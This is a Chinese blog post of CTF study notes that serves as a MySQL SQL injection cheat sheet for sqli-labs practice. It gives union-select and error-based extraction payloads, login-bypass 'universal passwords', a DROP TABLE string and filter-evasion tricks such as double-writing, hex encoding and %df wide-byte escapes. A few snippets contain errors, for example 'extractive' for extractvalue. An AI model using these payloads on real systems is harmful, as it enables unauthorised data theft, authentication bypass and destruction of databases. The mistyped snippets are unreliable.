<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/pigeon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/pigeon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"az1mus.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.18.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"width":200},"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="常见的 SQL 注入可以帮助绕过用户名密码、构造 payload 获取表格元数据等，有助于攻击网站后端。">
<meta property="og:type" content="article">
<meta property="og:title" content="粗略的 SQL 注入总结">
<meta property="og:url" content="https://az1mus.github.io/2023/08/28/Junior-SQL-Injection/index.html">
<meta property="og:site_name" content="Az1mus☆">
<meta property="og:description" content="常见的 SQL 注入可以帮助绕过用户名密码、构造 payload 获取表格元数据等，有助于攻击网站后端。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-08-28T12:41:01.000Z">
<meta property="article:modified_time" content="2023-09-11T14:10:17.774Z">
<meta property="article:author" content="az1mus">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="SQL注入">
<meta property="article:tag" content="sqli-labs">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://az1mus.github.io/2023/08/28/Junior-SQL-Injection/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://az1mus.github.io/2023/08/28/Junior-SQL-Injection/","path":"2023/08/28/Junior-SQL-Injection/","title":"粗略的 SQL 注入总结"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>粗略的 SQL 注入总结 | Az1mus☆</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Az1mus☆</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">基础知识</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">基础注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.</span> <span class="nav-text">盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">4.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#xpath-%E9%94%99%E8%AF%AF"><span class="nav-number">4.1.</span> <span class="nav-text">xpath 错误</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#extractvalue"><span class="nav-number">4.1.1.</span> <span class="nav-text">extractvalue</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#updatexml"><span class="nav-number">4.1.2.</span> <span class="nav-text">updatexml</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BB%E9%94%AE%E9%87%8D%E5%A4%8D"><span class="nav-number">4.2.</span> <span class="nav-text">主键重复</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%A0%E4%BD%95%E4%B8%8E%E6%95%B0%E5%AD%A6"><span class="nav-number">4.3.</span> <span class="nav-text">几何与数学</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="nav-number">5.</span> <span class="nav-text">万能密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%A3%80%E6%B5%8B"><span class="nav-number">6.</span> <span class="nav-text">绕过检测</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99"><span class="nav-number">6.1.</span> <span class="nav-text">大小写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E5%86%99"><span class="nav-number">6.2.</span> <span class="nav-text">双写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A"><span class="nav-number">6.3.</span> <span class="nav-text">注释</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E7%A0%81"><span class="nav-number">6.4.</span> <span class="nav-text">编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%A6%E5%8F%B7"><span class="nav-number">6.5.</span> <span class="nav-text">符号</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC"><span class="nav-number">6.5.1.</span> <span class="nav-text">空格</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%97%E5%8F%B7"><span class="nav-number">6.5.2.</span> <span class="nav-text">逗号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AD%89%E5%8F%B7"><span class="nav-number">6.5.3.</span> <span class="nav-text">等号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E7%AC%A6%E5%8F%B7"><span class="nav-number">6.5.4.</span> <span class="nav-text">比较符号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BC%95%E5%8F%B7"><span class="nav-number">6.5.5.</span> <span class="nav-text">引号</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sqli-labs"><span class="nav-number">7.</span> <span class="nav-text">sqli-labs</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%B3%A8%E5%85%A5%E5%86%85%E5%AE%B9"><span class="nav-number">7.1.</span> <span class="nav-text">常见注入内容</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%96%B9%E6%B3%95%E6%80%BB%E7%BB%93"><span class="nav-number">7.2.</span> <span class="nav-text">注入方法总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2"><span class="nav-number">7.2.1.</span> <span class="nav-text">联合查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5-xml"><span class="nav-number">7.2.2.</span> <span class="nav-text">报错注入-xml</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="nav-number">7.2.3.</span> <span class="nav-text">布尔盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BB%B6%E6%97%B6%E7%9B%B2%E6%B3%A8"><span class="nav-number">7.2.4.</span> <span class="nav-text">延时盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%AD%A5%E9%AA%A4%E6%80%BB%E7%BB%93"><span class="nav-number">7.3.</span> <span class="nav-text">注入步骤总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap"><span class="nav-number">7.4.</span> <span class="nav-text">sqlmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Page-1-Basic-Challenges"><span class="nav-number">7.5.</span> <span class="nav-text">Page 1 Basic Challenges</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-1-4"><span class="nav-number">7.5.1.</span> <span class="nav-text">Less-1~4</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-5-6"><span class="nav-number">7.5.2.</span> <span class="nav-text">Less-5~6</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-7-10"><span class="nav-number">7.5.3.</span> <span class="nav-text">Less-7~10</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="az1mus"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">az1mus</p>
  <div class="site-description" itemprop="description">Ciallo～(∠・ω< )⌒★</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">31</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/az1mus" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;az1mus" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://az1mus.github.io/2023/08/28/Junior-SQL-Injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="az1mus">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Az1mus☆">
      <meta itemprop="description" content="Ciallo～(∠・ω< )⌒★">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="粗略的 SQL 注入总结 | Az1mus☆">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          粗略的 SQL 注入总结
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-08-28 20:41:01" itemprop="dateCreated datePublished" datetime="2023-08-28T20:41:01+08:00">2023-08-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-09-11 22:10:17" itemprop="dateModified" datetime="2023-09-11T22:10:17+08:00">2023-09-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/CTF%E7%9F%A5%E8%AF%86/" itemprop="url" rel="index"><span itemprop="name">CTF知识</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>常见的 SQL 注入可以帮助绕过用户名密码、构造 payload 获取表格元数据等，有助于攻击网站后端。</p>
<span id="more"></span>

<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>一般的 SQL 注入点都会长这样：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT ... &quot;</span>;</span><br></pre></td></tr></table></figure>

<p>倘若服务器对来自于用户的变量<code>id</code>没有加以限制，那么就可以通过构造<code>id</code>来进行一些规则之外的查询，例如查询其他表格中的敏感信息，或是 SQL 元数据。通常情况下，利用<code>union select</code>进行联合查询，注意如果<code>union select</code>之前查到就不会执行后面的了。</p>
<p>SQL 中的注释符号为<code>#</code>或<code>--</code>，需要通过注释来绕过基本的限制，最常见的做法是在构造的<code>id</code>末尾添加<code>--+</code>或<code>--空格</code>将剩余的语句注释掉。</p>
<p>SQL 通常分为字符型和数字型查找，字符型额外多一对单引号，需要手动添加上其中的一个（与原先的左半个匹配，原先的另一个被注释掉了）。</p>
<h2 id="基础注入"><a href="#基础注入" class="headerlink" title="基础注入"></a>基础注入</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span><span class="operator">=</span>&quot;SELECT * FROM users WHERE id=&#x27;1&#x27; order by 3#</span><br></pre></td></tr></table></figure>

<p><code>order by</code>后不加参数会报错，而加参数会在超过列数时报错。利用网站的报错信息可以知道表格列数。</p>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><p>可以通过 <code>union select</code> 查询<code>database()</code>和<code>version()</code>等信息：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span><span class="operator">=</span>&quot;SELECT * FROM users WHERE id=&#x27;1&#x27; union select 1,database(),version()#</span><br></pre></td></tr></table></figure>

<p>得知数据库名称后，利用<code>information_schema.columns</code>依次得到表名称、列名称和列中数据。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database())</span><br><span class="line">(<span class="keyword">select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27;&lt;tablename&gt;&#x27;</span> <span class="keyword">and</span> table_schema<span class="operator">=</span>database())</span><br><span class="line">(<span class="keyword">select</span> group_concat(username,<span class="string">&#x27;|&#x27;</span>,password) <span class="keyword">from</span> <span class="operator">&lt;</span>tablename<span class="operator">&gt;</span>)</span><br></pre></td></tr></table></figure>

<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h3 id="xpath-错误"><a href="#xpath-错误" class="headerlink" title="xpath 错误"></a>xpath 错误</h3><p>报错：XPATH syntax error: ‘~&lt;信息&gt;‘</p>
<p>要求 MySQL &gt; 5.1.5</p>
<p>P.S.</p>
<blockquote>
<p><code>&#39;~&#39;</code>可以换成<code>&#39;#&#39;</code> <code>&#39;$&#39;</code>等不满足 xpath 格式的字符<br>extractvalue 最多支持长度为32的字符串<br><code>0x7e</code> &#x3D; <code>&#39;~&#39;</code></p>
</blockquote>
<h4 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue"></a>extractvalue</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">select</span> extractive(<span class="string">&#x27;anything&#x27;</span>, concat(<span class="string">&#x27;~&#x27;</span>, (<span class="keyword">select</span> database()))))</span><br></pre></td></tr></table></figure>

<h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">select</span> updatexml(<span class="string">&#x27;anything&#x27;</span>, concat(<span class="string">&#x27;~&#x27;</span>, (<span class="keyword">select</span> database())), <span class="string">&#x27;anything&#x27;</span>))</span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据库名：<span class="string">&#x27;and(select updatexml(1,concat(0x7e,(select database())),0x7e))</span></span><br><span class="line"><span class="string">爆表名：&#x27;</span><span class="keyword">and</span>(<span class="keyword">select</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(table_name)<span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database())),<span class="number">0x7e</span>))</span><br><span class="line">爆列名：<span class="string">&#x27;and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=&quot;TABLE_NAME&quot;)),0x7e))</span></span><br><span class="line"><span class="string">爆数据：&#x27;</span><span class="keyword">and</span>(<span class="keyword">select</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> group_concat(COLUMN_NAME)<span class="keyword">from</span> TABLE_NAME)),<span class="number">0x7e</span>))</span><br></pre></td></tr></table></figure>

<h3 id="主键重复"><a href="#主键重复" class="headerlink" title="主键重复"></a>主键重复</h3><p><code>concat</code> <code>rand</code> <code>group_by</code> 导致主键重复，试了好像没成功，据说新版 mysql 已经修了这个 bug。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据库名：<span class="string">&#x27;union select 1 from (select count(*),concat((select database()),&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span></span><br><span class="line"><span class="string">爆表名：&#x27;</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>),concat((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database() limit <span class="number">0</span>,<span class="number">1</span>) ,&quot; &quot;,<span class="built_in">floor</span>(rand(<span class="number">0</span>)<span class="operator">*</span><span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a</span><br><span class="line">爆列名：<span class="string">&#x27;union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=&quot;TABLE_NAME&quot; limit 0,1) ,&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span></span><br><span class="line"><span class="string">爆数据：&#x27;</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>),concat((<span class="keyword">select</span> COLUMN_NAME <span class="keyword">from</span> TABLE_NAME limit <span class="number">0</span>,<span class="number">1</span>) ,&quot; &quot;,<span class="built_in">floor</span>(rand(<span class="number">0</span>)<span class="operator">*</span><span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a</span><br></pre></td></tr></table></figure>

<h3 id="几何与数学"><a href="#几何与数学" class="headerlink" title="几何与数学"></a>几何与数学</h3><p>在5.5~5.6的 mysql 中，几何绘制函数如 <code>geometrycollection</code> <code>multipoint</code> <code>polygon</code> <code>multipolygon</code> <code>linestring</code> <code>multilinestring</code> 无法用字符串画出图形，会报错。类似的还有数学运算函数如 <code>exp</code> 等。</p>
<p>之后会强制要求参数为数字，字符串内容不会显示在报错信息中。</p>
<h2 id="万能密码"><a href="#万能密码" class="headerlink" title="万能密码"></a>万能密码</h2><p>利用 SQL 注入，除了获得想要的信息外，还可以绕过某些代码，如用户登录认证。在密码中注入 SQL 代码，使得正确性判断恒为真。</p>
<p>常见的万能密码如下。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; or &#x27;</span><span class="number">1</span><span class="string">&#x27; = &#x27;</span><span class="number">1</span></span><br><span class="line">admin<span class="string">&#x27; or &#x27;</span><span class="number">1</span><span class="string">&#x27; = &#x27;</span><span class="number">1</span>  # 用户名</span><br><span class="line">$uname    $passwd</span><br><span class="line">admin<span class="string">&#x27;);DROP TABLE table_name;--    # 破坏用</span></span><br></pre></td></tr></table></figure>

<h2 id="绕过检测"><a href="#绕过检测" class="headerlink" title="绕过检测"></a>绕过检测</h2><p>参考了<a target="_blank" rel="noopener" href="https://www.cnblogs.com/pursue-security/p/15256736.html">这篇博客</a>。</p>
<h3 id="大小写"><a href="#大小写" class="headerlink" title="大小写"></a>大小写</h3><p>SQL 无视大小写，因此随机大小写，可以绕过一些简单的检测。</p>
<h3 id="双写"><a href="#双写" class="headerlink" title="双写"></a>双写</h3><p>某些过滤器会将字符串中的关键字替换为空，这时如果关键字外面套了一层，就会变成正常的一个关键字，例如<code>SEselectLECT</code>。</p>
<h3 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h3><p>使用<code>--</code>和<code>#</code>注释整行，使用<code>/**/</code>注释一部分。注意<code>/*!*/</code>在 MySQL 中能被执行，所以可以用来绕过过滤。</p>
<p>如果注释全被过滤了，使用闭合 SQL 语句代替注释符。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27; union select 1,2,3||&#x27;</span><span class="number">1</span></span><br><span class="line">　　最后的<span class="keyword">or</span> <span class="string">&#x27;1闭合查询语句的最后的单引号，或者：</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">id=1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">&#x27;3</span></span><br></pre></td></tr></table></figure>

<h3 id="编码"><a href="#编码" class="headerlink" title="编码"></a>编码</h3><p>SQL 会将编码转义，但是过滤器不一定会转义编码。此外，在字符串注入的情况下，如果引号被过滤，可以将字符串变为16进制编码，例如：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_name<span class="operator">=</span>&quot;users&quot;</span><br><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_name<span class="operator">=</span><span class="number">0x7573657273</span></span><br></pre></td></tr></table></figure>

<h3 id="符号"><a href="#符号" class="headerlink" title="符号"></a>符号</h3><p>替换关键字最好是一起用，免得过不了双写过滤。</p>
<h4 id="空格"><a href="#空格" class="headerlink" title="空格"></a>空格</h4><p>空格用下面这些代替：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**/</span></span><br><span class="line">()</span><br><span class="line"><span class="operator">+</span>   # 在url中加号可以代替空格</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>d <span class="operator">%</span><span class="number">0</span>a <span class="operator">%</span><span class="number">0</span>c <span class="operator">%</span><span class="number">0</span>b <span class="operator">%</span>a0   # url中可以使用这些代替空格</span><br><span class="line">`   # tab键上面的按钮</span><br><span class="line">tab</span><br><span class="line">两个空格</span><br></pre></td></tr></table></figure>

<h4 id="逗号"><a href="#逗号" class="headerlink" title="逗号"></a>逗号</h4><p><code>substr()</code>和<code>mid()</code>可以用<code>from ... to</code>代替：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> substr(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br><span class="line"><span class="keyword">select</span> mid(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br></pre></td></tr></table></figure>

<p><code>join</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>     #等价于</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>)a <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)b</span><br></pre></td></tr></table></figure>

<p><code>like</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> ascii(mid(<span class="keyword">user</span>(),<span class="number">1</span>,<span class="number">1</span>))<span class="operator">=</span><span class="number">80</span>   #等价于</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">user</span>() <span class="keyword">like</span> <span class="string">&#x27;r%&#x27;</span></span><br></pre></td></tr></table></figure>

<p><code>limit</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"># 等价于下面这条<span class="keyword">SQL</span>语句</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span></span><br></pre></td></tr></table></figure>

<h4 id="等号"><a href="#等号" class="headerlink" title="等号"></a>等号</h4><p>使用<code>in</code>或<code>like</code>代替等号。</p>
<h4 id="比较符号"><a href="#比较符号" class="headerlink" title="比较符号"></a>比较符号</h4><p>使用<code>greatest``least</code>代替比较符号。</p>
<h4 id="引号"><a href="#引号" class="headerlink" title="引号"></a>引号</h4><p>除了上文提到的16进制替换，还能利用过滤器过滤引号的原理进行攻击。过滤器将引号<code>&#39;</code>变为转义引号<code>\&#39;</code>使其失去闭合的作用。通过在引号前加上<code>%df</code>将反斜杠和前面的<code>%df</code>组合形成 GBK 汉字；或者直接在<code>&#39;</code>前加反斜杠把用来转义的反斜杠转义掉。根据不同过滤用 PHP 函数进行选择。</p>
<blockquote>
